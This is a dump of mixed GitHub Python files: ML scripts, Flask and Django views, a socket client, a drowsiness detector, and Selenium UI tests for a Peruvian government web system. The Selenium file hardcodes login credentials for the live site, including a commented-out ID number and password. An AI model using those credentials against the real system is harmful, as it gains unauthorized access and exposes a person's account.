{muw2} / variance w1 {varw1} w2 {varw2} (NOTE: emb_dim {emb_dim})\")\n # first vector = blank token\n assert (w1[0, :] == 0).all()\n assert (w2[0, :] == 0).all()\n assert close_enough(muw1, 0, 1/(3.3333*emb_dim))\n assert close_enough(muw2, 0, 1/(3.3333*emb_dim))\n assert close_enough(varw1, 1/emb_dim, 1/(3.3333*emb_dim))\n assert close_enough(varw2, 1/emb_dim, 1/(3.3333*emb_dim))\n","repo_name":"tsaastam/myw2v","sub_path":"tests/myw2v_test.py","file_name":"myw2v_test.py","file_ext":"py","file_size_in_byte":14473,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"74743076641","text":"from flask import Flask, request, render_template,flash\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\napp.config[\"APPLICATION_ROOT\"] = \"/\"\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef main():\n if request.method == \"POST\":\n print(request.form.get('lat'))\n print(request.form.get('long'))\n lat = request.form.get('lat')\n long = request.form.get('long')\n error = None\n if error is not None:\n flash(error)\n return render_template('base.html', lat=lat, long=long)\n else:\n return render_template('base.html')\n","repo_name":"marshj2/Plot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6876835822","text":"import os\n\ndef setGameDirVar(var):\n global gameDirVar\n gameDirVar = var\n\ndef execute(totalblocks, entity_list,skybox, skyboxgeolist, light):\n compiledblocks=''\n totalentities=''\n beg_template = open(gameDirVar+'prefab_template/beginning_template.txt', 'r+')\n beg_template = beg_template.readlines()\n beg_template = \"\".join(beg_template)\n beg_template = beg_template.replace('CURRENT_SKYBOX',skybox)\n skyboxgeolist = \"\".join(skyboxgeolist)\n end_template = \"\"\" \ncameras\n{\n \"activecamera\" \"-1\"\n}\ncordon\n{\n \"mins\" \"(-10240 -10240 -10240)\"\n \"maxs\" \"(10240 10240 10240)\"\n \"active\" \"0\"\n}\n \"\"\"\n #end of file template that ends each vmf\n #print(totalblocks)\n compiledblocks = \"\".join(totalblocks) #totalblocks will be a list of each \"block\" from each chunk in the map, put into 1 string here.\n for i in range(compiledblocks.count(\"world_id_num\")):\n compiledblocks = compiledblocks.replace(\"world_id_num\",str(i),1) \n for i in range(compiledblocks.count(\"id_num\")):\n compiledblocks = compiledblocks.replace(\"id_num\",str(i),1)\n totalentities = \"\".join(entity_list)\n compiledblocks = compiledblocks.replace('EMPTY_SLOT','')\n #totalentities = \"\".join(entity_list)\n totalentities = totalentities.replace('NO_ENTITY','')\n whole = beg_template + compiledblocks + skyboxgeolist + \"}\\n\"+totalentities + light + end_template\n #whole = beg_template + compiledblocks + \"}\\n\"+ end_template\n \n\n return whole\n\ngameDirVar=''\n","repo_name":"baldengineers/mapper","sub_path":"export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31829792238","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom app.models import *\n\n# Create your views here.\ndef insert_Topic(request):\n tn=input('enter topic_name: ')\n TO=Topic.objects.get_or_create(topic_name=tn)[0]\n TO.save()\n return HttpResponse('Topic Inserted Successfully')\n\ndef insert_Webpage(request):\n tn=input('enter Topic_name: ')\n name=input('enter name: ')\n url=input('enter url: ')\n email=input('enter email: ')\n TO=Topic.objects.get_or_create(topic_name=tn)[0]\n TO.save()\n WO=Webpage.objects.get_or_create(topic_name=TO,name=name,url=url,email=email)[0]\n WO.save()\n return HttpResponse('Webpage Data Inserted Successfully')\n\ndef insert_AccessRecord(request):\n tn=input('enter Topic_name: ')\n name=input('enter name: ')\n url=input('enter url: ')\n author=input('enter author name: ')\n date=input('enter date: ')\n TO=Topic.objects.get_or_create(topic_name=tn)[0]\n TO.save()\n WO=Webpage.objects.get_or_create(topic_name=TO,name=name,url=url,email=email)[0]\n WO.save()\n AO=AccessRecord.objects.get_or_create(name=WO,author=author,date=date)[0]\n AO.save()\n return HttpResponse('AccessRecord Inserted Successfully')\n\n","repo_name":"supraja-maddineni/models_insert_data_by_views","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2585925295","text":"import kagglegym\r\nimport numpy as np\r\nimport pandas as pd\r\nimport xgboost as xgb\r\n\r\n# The \"environment\" is our interface for code competitions\r\nenv = kagglegym.make()\r\n\r\n# We get our initial observation by calling \"reset\"\r\nobservation = env.reset()\r\n\r\n## features\r\nfeat = ['fundamental_11', 'technical_19', 'technical_20', 'technical_30']\r\n\r\n## training data\r\ndtrain = xgb.DMatrix(observation.train[feat], label = observation.train['y'].values)\r\n\r\n## parameters\r\nparam = {'booster': 'gbtree',\r\n 'objective': 'reg:linear',\r\n 'learning_rate': 0.025,\r\n 'max_depth': 2,\r\n 'subsample': 0.5,\r\n 'colsample_bytree': 0.7,\r\n 'colsample_bylevel': 0.7,\r\n 'silent': 1\r\n}\r\n\r\n## train model\r\nprint('train model...')\r\nbst = xgb.train(params = param,\r\n dtrain = dtrain,\r\n num_boost_round = 500)\r\n\r\nprint('predicting...')\r\nwhile True:\r\n timestamp = observation.features['timestamp'][0]\r\n target = observation.target\r\n dtest = xgb.DMatrix(observation.features[feat])\r\n pred = bst.predict(dtest)\r\n observation.target.y = pred\r\n \r\n if timestamp % 100 == 0:\r\n print('Timestamp #{}'.format(timestamp))\r\n \r\n # We perform a \"step\" by making our prediction and getting back an updated \"observation\":\r\n observation, reward, done, info = env.step(target)\r\n if done:\r\n print('Public score: {}'.format(info['public_score']))\r\n break\r\n ","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/two-sigma-financial-modeling/Danijel Kivaranovic/simple-xgboost-starter.py","file_name":"simple-xgboost-starter.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"36368900927","text":"\nfrom selenium import webdriver\n\n\n# from pruebas-UI-SisDNA.diccionarios.diccionarios_SisDNA import diccionarios_SisDNA\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import ElementNotInteractableException\nimport time\n\n##############################################################################################################\n#MOVIMIENTOS EN EL SISTEMA:\n# 1. Ingresar SisDNA.\n# 2. Salir SisDNA.\n# 4. Ingresar módulo y submódulo.\n\n##############################################################################################################\ndef diccionarios_SisDNA(nombre_diccionario=\"modulos\"):\n # navegacion_SisDNA[nombre_modulo][url]-> direccion modulo\n # navegacion_SisDNA[nombre_modulo][submodulos][nombre_submodulo][url]-> direccion submodulo\n # navegacion_SisDNA[nombre_modulo][submodulos][nombre_submodulo][css_evidencia]-> evidencia de ingreso a submodulo en modulo\n navegacion_SisDNA ={\n \"home\":{\"url\":\"Inicio\"},\n \"dna\":{\n \"url\":\"0\",\n \"submodulos\":{\"dna\":{\"url\":\"/dna/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt155 > div > span\"},\n \"acreditacion\":{\"url\":\"/acreditacion/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt480 > div > span\"},\n \"supervision\":{\"url\":\"/supervision/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt301 > div > span\"},\n \"capacitacion programacion\":{\"url\":\"/capacitacion/curso/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt181 > div.bctitle.clearfix > span\"},\n \"capacitacion ejecucion\":{\"url\":\"/capacitacion/solicitud/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt224 > div > span\"},\n \"reporte\":{\"url\":\"/reporte/\",\n \"css_evidencia\":\"#j_idt57 > div > div > span\"}\n }\n }, \n \"riesgo\":{\n \"url\":\"1\", \n \"submodulos\":{ \"recepcion\":{\"url\":\"/demuna/recepcion/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt155 > div > span\"},\n \"valoracion\":{\"url\":\"/demuna/valoracion/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt155 > div > span\"},\n \"evaluacion\":{\"url\":\"/demuna/evaluacion/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt155 > div > span\"},\n \"pti\":{\"url\":\"/demuna/pti/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt155 > div > span\"},\n \"reportes\":{\"url\":\"/demuna/reporte/\",\n \"css_evidencia\":\"#j_idt57 > div > div > span\"},\n }\n },\n\n \"mantenimiento\":{\n \"url\":\"2\",\n \"submodulos\":{\"municipalidades\":{\"url\":\"/mantenimiento/municipalidad/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt95 > div.bctitle.clearfix > span\"},\n \"catalogo\":{\"url\":\"/mantenimiento/catalogo/\",\n \"css_evidencia\":\"#content > section > div.bctitle.clearfix > span\"},\n \"parametros\":{\"url\":\"/mantenimiento/parametro/\",\n \"css_evidencia\":\"#content > section > div.bctitle.clearfix > span\"},\n \"colegios\":{\"url\":\"/mantenimiento/colegio/\",\n \"css_evidencia\":\"#content > section > div.bctitle.clearfix > span\"},\n \"carga inicial\":{\"url\":\"/mantenimiento/cargainicial/\",\n \"css_evidencia\":\"#frmDna > h1\"},\n }\n },\n \"seguridad\":{\n \"url\":\"3\",\n \"submodulos\":{\"usuarios\":{\"url\":\"/seguridad/\",\n \"css_evidencia\":\"#frmGestion\\:j_idt58 > div.bctitle.clearfix > span\"}\n }\n }\n }\n diccionarios = {\"navegacion\":navegacion_SisDNA}\n return diccionarios[nombre_diccionario]\n\ndef MoverClick(driver, elemento_click):\n try:\n mover_mouse = webdriver.ActionChains(driver)\n mover_mouse.move_to_element(elemento_click).click().perform()\n except Exception as e:\n print(\"Error en mover click: \",e)\n time.sleep(1)\n\ndef MoverClick_wait(driver,wait, elemento_click, css_elemento_wait):\n try:\n mover_mouse = webdriver.ActionChains(driver)\n mover_mouse.move_to_element(elemento_click).click().perform()\n inicio=time.time()\n elemento_wait = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, css_elemento_wait)))\n fin=time.time()\n tiempo = fin - inicio\n tiempo_formateado = \"{:.{}f}\".format(tiempo, 5)\n return tiempo_formateado\n except Exception as e:\n print(\"Error en mover click wait: \",e)\n \n\n# Darle click al vacío para que funcione\ndef click_vacio(driver, elemento_vacio ='j_idt22:j_idt24'):\n elemento_vacio = driver.find_element(By.ID,elemento_vacio)\n MoverClick(driver,elemento_vacio)\n\ndef limpiar_enviar(wait, id_campo, valor):\n input_user = wait.until(EC.visibility_of_element_located((By.ID, id_campo)))\n input_user.clear()\n input_user.send_keys(valor)\n\ndef boton_respuesta_lenta(wait, id_boton, xpath_elemento_esperado):\n try:\n buttom = wait.until(EC.visibility_of_element_located((By.ID, id_boton)))\n buttom.click()\n respuesta = wait.until(EC.presence_of_element_located((By.XPATH, xpath_elemento_esperado)))\n return 1, respuesta.text\n except Exception as e:\n print(\"El error en boton respuesta es: \",e)\n\ndef boton_respuesta_css(driver, css_id_buttom, css_confirm_window):\n buttom=driver.find_element(By.CSS_SELECTOR, css_id_buttom)\n buttom.click()\n confirm_message=driver.find_element(By.CSS_SELECTOR, css_confirm_window)\n return 1, confirm_message.text\n\n# Encontrar el ID existente sino retornar nulo.\ndef probar_ids(driver, ids):\n for id in ids:\n try:\n elemento=driver.find_element(By.ID,id)\n return elemento\n except ElementNotInteractableException:\n continue\n except NoSuchElementException:\n continue\n except TimeoutException:\n continue\n return None\n\n########################################################################################################\n# 1. INGRESAR SISDNA.\ndef Ingresar_Sistema(driver,wait, url_login = \"https://ws01.mimp.gob.pe/sisdna-web/faces/login.xhtml\", id_login_buttom = \"formularioPrincipal:j_idt45\",xpath_home_element = \"//div[@id='j_idt54']/h3\", username=\"admin\", password=\"123456\"):\n id_username = \"formularioPrincipal:username\"\n id_password = \"formularioPrincipal:password\"\n try:\n driver.get(url_login) #Ingresa al URL\n driver.implicitly_wait(5) #Se le adiciona un tiempo de espera adicional para esperar respuesta del servidor\n limpiar_enviar(wait, id_username, username) #Send username\n limpiar_enviar(wait, id_password, password) #Send password\n n , respuesta = boton_respuesta_lenta(wait, id_login_buttom, xpath_home_element) #Hacerle click al botón y esperar elemento del Home\n print(\"Ingreso del sistema exitoso: \", respuesta)\n return n \n except Exception as e:\n print(\"Error en el ingreso del sistema: \", e)\n return 0\n########################################################################################################\n\n\n########################################################################################################\n# 2. SALIR DEL SISTEMA\ndef Salir_Sistema(driver, css_logout=\"#j_idt22\\:logout\", css_confirm_logout = \"#formularioPrincipal > div > div:nth-child(1) > div > h1\"):\n try:\n n, confirm_message=boton_respuesta_css(driver, css_logout, css_confirm_logout)\n print(\"Salida del sistema exitosa: \", confirm_message)\n return n\n except Exception as e:\n print(\"Error en la salida del Sistema: \",e)\n return 0\n\n########################################################################################################\n\n########################################################################################################\n# 3. INGRESAR AL MÓDULO Y SUBMÓDULO\n\ndef Ingresar_Modulo_Submodulo(driver, wait, modulo_nombre=\"home\", submodulo_nombre=None):\n try: \n navegacion_SisDNA = diccionarios_SisDNA(\"navegacion\")\n modulos_SisDNA = list(navegacion_SisDNA.keys())\n \n \n # Verificar si el módulo existe\n if modulo_nombre not in modulos_SisDNA:\n print(f\"No existe el módulo '{modulo_nombre}'. Debe elegir entre:\")\n for modulo in modulos_SisDNA.keys():\n print(modulo)\n return\n\n modulo_selector = f'a[data-tooltip-content=\"#tc{navegacion_SisDNA[modulo_nombre][\"url\"]}\"]'\n modulo = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, modulo_selector)))\n MoverClick(driver, modulo)\n #print(f\"Ingreso al módulo ({modulo_nombre}) exitoso\")\n\n submodulos_modulo = list(navegacion_SisDNA[modulo_nombre][\"submodulos\"].keys())\n \n # Verificar si el submódulo existe\n if submodulo_nombre and submodulo_nombre not in submodulos_modulo:\n print(f\"No existe el submódulo '{submodulo_nombre}' en el módulo '{modulo_nombre}'. Debe elegir entre:\")\n for submodulo in submodulos_modulo:\n print(submodulo)\n return\n \n if submodulo_nombre:\n direccion = navegacion_SisDNA[modulo_nombre][\"submodulos\"][submodulo_nombre][\"url\"]\n elemento_evidencia = navegacion_SisDNA[modulo_nombre][\"submodulos\"][submodulo_nombre][\"css_evidencia\"]\n submodulo_selector = f'a[href=\"https://ws01.mimp.gob.pe/sisdna-web/faces{direccion}listado.xhtml\"]'\n submodulo = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, submodulo_selector)))\n tiempo = MoverClick_wait(driver, wait, submodulo, elemento_evidencia)\n print(f\"Ingreso al submódulo ({submodulo_nombre}) en el módulo ({modulo_nombre}) exitoso: tiempo ({tiempo}) segundos\")\n except Exception as e:\n print(\"Error en Ingresar módulo submódulo: \",e)\n pass\n\n########################################################################################################\n\ndef Prueba():\n driver = webdriver.Chrome()\n wait = WebDriverWait(driver, 20)\n #Ingresar_Sistema(driver,wait,username=\"72623744\",password=\"123456$$dan\")\n Ingresar_Sistema(driver,wait)\n time.sleep(5)\n \n # Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"riesgo\")\n # time.sleep(5)\n\n # Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"dna\",submodulo_nombre=\"supervision\")\n # time.sleep(5)\n\n # Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"dna\",submodulo_nombre=\"dna\")\n # time.sleep(5)\n\n # Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"dna\",submodulo_nombre=\"acreditacion\")\n # time.sleep(5)\n\n # Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"dna\",submodulo_nombre=\"capacitacion programacion\")\n # time.sleep(5)\n\n Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"seguridad\",submodulo_nombre=\"usuarios\")\n time.sleep(5)\n\n Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"dna\",submodulo_nombre=\"acreditacion\")\n time.sleep(5)\n\n Salir_Sistema(driver)\n time.sleep(5)\n #Salir_Sistema(driver=driver,wait=wait)\n #time.sleep(5)\n # cont=0\n # cont+=Prueba_0(driver=driver,wait=wait)\n # print(\"Número de pruebas exitosas: \",cont)\n # driver.implicitly_wait(5)\n driver.quit()\n\n\n\nif __name__ == \"__main__\":\n Prueba()","repo_name":"danjoshuasg/pruebas-UI-SisDNA","sub_path":"acciones/acciones_movimiento.py","file_name":"acciones_movimiento.py","file_ext":"py","file_size_in_byte":13328,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"27680997099","text":"import socket\r\ns=socket.socket()\r\nhost=socket.gethostname()\r\nport=8080\r\ns.connect((host,port))\r\nwhile 1:\r\n print(\"Connected to chat server\")\r\n msg=(s.recv(1024)).decode('utf-8')\r\n if msg==\"b\":\r\n break\r\n else:\r\n print(msg)\r\n #print( s.recv(1024))\r\n message=input(\"-:\")\r\n s.send(message.encode('utf-8'))\r\n print(\"message has been sent\")\r\n\r\n\r\n","repo_name":"nablashan/watercan","sub_path":"python/clientserver/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39002459345","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 27 23:50:57 2018\r\n\r\n@author: shubham pathak\r\n\"\"\"\r\nfrom speechRecog import *\r\nimport playText\r\nimport operandGenerator\r\nimport operatorDetector\r\n\r\n\r\n# The text that you want to convert to audio\r\nplayText.playString('Welcome to the new age of calculator. How may i help you?')\r\nresult=0\r\nwhile(1): \r\n a=''\r\n b=''\r\n operator=''\r\n \r\n mytext = getString()\r\n if(type(mytext).__name__=='NoneType'):\r\n playText.playString('Sorry I didn\\'t get that. Try again')\r\n continue\r\n \r\n operator = operatorDetector.findOperator(mytext)\r\n if(operator=='c'):\r\n playText.playString('Thanks for using me. See ya. Good Bye')\r\n break\r\n elif(operator=='gtng'):\r\n playText.playString('Hello shubhi')\r\n elif (operator == '-1'):\r\n playText.playString('I dont think you are using me correctly. Bye bye')\r\n break\r\n a,b = operandGenerator.findOperand(mytext,result)\r\n if(a=='' and b==''):\r\n playText.playString('Sorry I didn\\'t recognised operands. Try again')\r\n continue\r\n if(b=='' or a==''):\r\n playText.playString('Sorry I didn\\'t find second operand. Say it again')\r\n while(a==''):\r\n mytext = getString()\r\n if(type(mytext).__name__=='NoneType'):\r\n playText.playString('Sorry. Please say the second operand again')\r\n continue\r\n try:\r\n a= float(mytext)\r\n except ValueError :\r\n a=''\r\n playText.playString('Sorry. Please say the second operand again')\r\n continue\r\n \r\n while(b==''):\r\n mytext = getString()\r\n if(type(mytext).__name__=='NoneType'):\r\n playText.playString('Sorry. Please say the second operand again')\r\n continue\r\n try:\r\n b= float(mytext)\r\n except ValueError :\r\n b=''\r\n playText.playString('Sorry. Please say the second operand again')\r\n continue\r\n if(operator == 'sf'):\r\n result = float(b)-float(a)\r\n elif(operator == '-'):\r\n result = float(a)-float(b)\r\n elif(operator == '/'):\r\n result = float(a)/float(b)\r\n elif(operator == 'dv'):\r\n result = float(b)/float(a)\r\n elif(operator=='+'):\r\n result = float(a) + float(b)\r\n elif(operator=='*'):\r\n result = float(a)*float(b)\r\n playText.playString('Answer is %0.3f' % (result))\r\n playText.playString('Do you wanna do more calculation?')\r\n mytext = getString()\r\n if(type(mytext).__name__=='NoneType'):\r\n playText.playString('We are unable to recognise your voice. Restart the app')\r\n break\r\n if 'no' in mytext:\r\n playText.playString('Thanks for using me. See ya. Good Bye')\r\n break\r\n else:\r\n playText.playString('I am ready again')\r\n \r\n \r\n\r\n","repo_name":"shbhmpthk/TalkingCalculator","sub_path":"Classifier.py","file_name":"Classifier.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14387662698","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib import rnn\n\nclass Encoder:\n def __init__(self, hidden_size, z_dim, time_steps, lstm_unit_size, action_num, state_num):\n\n self.h_dim = hidden_size\n self.z_dim = z_dim\n self.state_num = state_num\n\n self.time_steps = time_steps\n self.lstm_unit_size = lstm_unit_size\n self.action_num = action_num\n pass\n\n def create_network(self):\n with tf.name_scope('encoder') as scope:\n self.state_in = tf.placeholder(tf.float32, shape=[None, self.time_steps, self.state_num], name='encoder_input_x')\n # Unstack to get a list of 'time_steps' tensors of shape (batch_size, num_input)\n # unstack_state = tf.unstack(self.state_in, self.time_steps, 1)\n\n # 前向 cell\n lstm_fw_cell = rnn.BasicLSTMCell(self.lstm_unit_size, forget_bias=1.0)\n # 反向 cell\n lstm_bw_cell = rnn.BasicLSTMCell(self.lstm_unit_size, forget_bias=1.0)\n\n with tf.variable_scope('encoder_bi_lstm'):\n # outputs, _, _ = rnn.static_bidirectional_rnn(lstm_fw_cell, lstm_bw_cell, unstack_state, dtype=tf.float32)\n outputs, _ = tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell, lstm_bw_cell, self.state_in, dtype=tf.float32) # [batch_szie, max_time, depth]\n\n\n\n\n with tf.variable_scope('encoder_lstm_output_avg'):\n self.layer_avg = tf.reduce_mean([outputs[0]], 0)\n\n with tf.variable_scope('encoder_lstm_linear'):\n self.layer_after_avg = slim.fully_connected(self.layer_avg,\n self.h_dim,\n activation_fn=tf.nn.leaky_relu,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.0)\n )\n with tf.variable_scope('encoder_latent_mu'):\n self.z_mu = slim.fully_connected(self.layer_after_avg,\n self.z_dim,\n activation_fn=None,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.0)\n )\n with tf.variable_scope('encoder_latent_var'):\n self.z_var = slim.fully_connected(self.layer_after_avg,\n self.z_dim,\n activation_fn=None,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.0)\n )\n\n\n\n def sample_z(self, mu, var):\n eps = tf.random_normal(shape=tf.shape(mu))\n self.latent = mu + tf.exp(var / 2) * eps\n return self.latent\n\n def xavier_init(self, size):\n in_dim = size[0]\n xavier_stddev = 1. / tf.sqrt(in_dim / 2.)\n return tf.random_normal(shape=size, stddev=xavier_stddev)\n\n def get_model_param_list(self):\n return [variable for variable in tf.trainable_variables('encoder')]\n\n# if __name__ == '__main__':\n# e =Encoder(1,1,1)\n# e.create_network()\n# e.sample_z(1,1)\n# print(e.state_in, e.z_var, e.z_mu, e.latent)\n\n","repo_name":"zhkmxx9302013/ReinforcementLearning_experiment","sub_path":"VAE-GAIL/VAE/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1470255928","text":"from kivy.app import App\r\nfrom kivy.lang import Builder\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nimport time\r\nfrom imutils import face_utils\r\nimport dlib\r\nimport cv2\r\nimport time\r\nimport threading\r\nimport math\r\nfrom sklearn import tree\r\nimport pandas as pd\r\nimport numpy as np\r\nimport time\r\nfrom functools import partial\r\nfrom kivy.clock import Clock\r\nfrom kivy.graphics.texture import Texture\r\nfrom kivy.uix.screenmanager import ScreenManager, Screen\r\nfrom kivy.uix.widget import Widget\r\nfrom kivy.uix.image import Image\r\nfrom kivy.clock import Clock\r\nfrom kivy.core.audio import SoundLoader\r\nfrom threading import Thread\r\nimport time\r\n\r\nthread_running = True\r\n\r\nclass MainScreen(Screen):\r\n pass\r\n\r\n\r\nclass Manager(ScreenManager):\r\n pass\r\n\r\n\r\n\r\nBuilder.load_string('''\r\n:\r\n name: \"Monitoring\"\r\n\r\n FloatLayout:\r\n Label:\r\n text: \"Monitoring Drowsiness\"\r\n pos_hint: {\"x\":0.0, \"y\":0.8}\r\n size_hint: 1.0, 0.2\r\n\r\n Image:\r\n # this is where the video will show\r\n # the id allows easy access\r\n id: vid\r\n size_hint: 1, 0.6\r\n allow_stretch: True # allow the video image to be scaled\r\n keep_ratio: True # keep the aspect ratio so people don't look squashed\r\n pos_hint: {'center_x':0.5, 'top':0.8}\r\n\r\n\r\n''')\r\n\r\n\r\n\r\ndef training():\r\n a = pd.read_csv(\"blinkFatigue.csv\")\r\n\r\n features = np.array(a['BPM']).reshape((len(a['BPM']),-1))\r\n labels = a['FATIGUE']\r\n clf = tree.DecisionTreeClassifier()\r\n clf = clf.fit(features, labels)\r\n return clf\r\n\r\n\r\ndef Euclidean_Distance(x,y):\r\n dis = math.sqrt(sum([(a - b) ** 2 for a, b in zip(x, y)]))\r\n return dis\r\n\r\ndef eye_aspect_ratio(eye):\r\n A = Euclidean_Distance(eye[1], eye[5])\r\n B = Euclidean_Distance(eye[2], eye[4])\r\n C = Euclidean_Distance(eye[0], eye[3])\r\n D = (A+B)**2\r\n ear = D / (2.0 * C)\r\n\r\n return ear\r\n\r\ndef mouth_aspect_ratio(mouth):\r\n A = Euclidean_Distance(mouth[0], mouth[6])\r\n A = A**2\r\n B = Euclidean_Distance(mouth[3], mouth[9])\r\n B = B**2\r\n\r\n ear = A/B\r\n return ear\r\n\r\n\r\n\r\nclass Main(App):\r\n\r\n def build(self):\r\n\r\n # start the camera access code on a separate thread\r\n # if this was done on the main thread, GUI would stop\r\n # daemon=True means kill this thread when app stops\r\n threading.Thread(target=self.capture, daemon=True).start()\r\n\r\n sm = ScreenManager()\r\n self.main_screen = MainScreen()\r\n sm.add_widget(self.main_screen)\r\n return sm\r\n\r\n def update(self, dt):\r\n # display image from cam in opencv window\r\n ret, frame = self.capture.read()\r\n cv2.imshow(\"CV2 Image\", frame)\r\n # convert it to texture\r\n buf1 = cv2.flip(frame, 0)\r\n buf = buf1.tostring()\r\n texture1 = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr') \r\n #if working on RASPBERRY PI, use colorfmt='rgba' here instead, but stick with \"bgr\" in blit_buffer. \r\n texture1.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\r\n # display image from the texture\r\n self.img1.texture = texture1\r\n\r\n\r\n def capture(self):\r\n global thread_running\r\n chances = 0\r\n drowsy = 0\r\n siren = 0\r\n endfps= 0\r\n startfps=0\r\n blink = 0\r\n blink2 = 0\r\n yawn = 0\r\n yawn2 = 0\r\n lastBlink = 0\r\n blinkDur = 0\r\n op = 0\r\n timer1 = 0\r\n thresh = 3.5\r\n frame_check = 5\r\n detect = dlib.get_frontal_face_detector()\r\n predict = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")# Dat file is the crux of the code\r\n\r\n (lStart, lEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"left_eye\"]\r\n (rStart, rEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"right_eye\"]\r\n (mStart, mEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"mouth\"]\r\n (minStart, minEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"inner_mouth\"]\r\n (leStart, leEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"left_eyebrow\"]\r\n (reStart, reEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"right_eyebrow\"]\r\n (nStart, nEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"nose\"]\r\n\r\n\r\n # make a window for use by cv2\r\n # flags allow resizing without regard to aspect ratio\r\n cv2.namedWindow('Hidden', cv2.WINDOW_NORMAL | cv2.WINDOW_FREERATIO)\r\n\r\n # resize the window to (0,0) to make it invisible\r\n cv2.resizeWindow('Hidden', 0, 0)\r\n cap=cv2.VideoCapture(0)\r\n flag=0\r\n flag1 = 0\r\n count = 0\r\n start = time.time()\r\n start2 = time.time()\r\n\r\n clf = training()\r\n\r\n\r\n\r\n while True:\r\n\r\n siren = 0\r\n ret, frame= cap.read()\r\n count += 1\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n subjects = detect(gray, 0)\r\n try:\r\n subject = list(subjects)[0]\r\n shape = predict(gray, subject)\r\n shape = face_utils.shape_to_np(shape)#converting to NumPy Array\r\n\r\n leftEye = shape[lStart:lEnd]\r\n leftEAR = eye_aspect_ratio(leftEye)\r\n\r\n rightEye = shape[rStart:rEnd]\r\n rightEAR = eye_aspect_ratio(rightEye)\r\n\r\n ear = (leftEAR + rightEAR) / 2.0\r\n\r\n\r\n\r\n leftEyeHull = cv2.convexHull(leftEye)\r\n rightEyeHull = cv2.convexHull(rightEye)\r\n\r\n mouth = shape[mStart:mEnd]\r\n mouthHull = cv2.convexHull(mouth)\r\n\r\n mouthEAR = mouth_aspect_ratio(mouth)\r\n\r\n\r\n nose = shape[nStart:nEnd]\r\n noseHull = cv2.convexHull(nose)\r\n\r\n\r\n re = shape[reStart:reEnd]\r\n reHull = cv2.convexHull(re)\r\n\r\n le = shape[leStart:leEnd]\r\n leHull = cv2.convexHull(le)\r\n\r\n cv2.drawContours(frame, [leftEyeHull], -1, (255, 255, 0), 1)\r\n cv2.drawContours(frame, [rightEyeHull], -1, (255, 255, 0), 1)\r\n cv2.drawContours(frame, [mouthHull], -1, (255, 255, 0), 1)\r\n cv2.drawContours(frame, [noseHull], -1, (255, 255, 0), 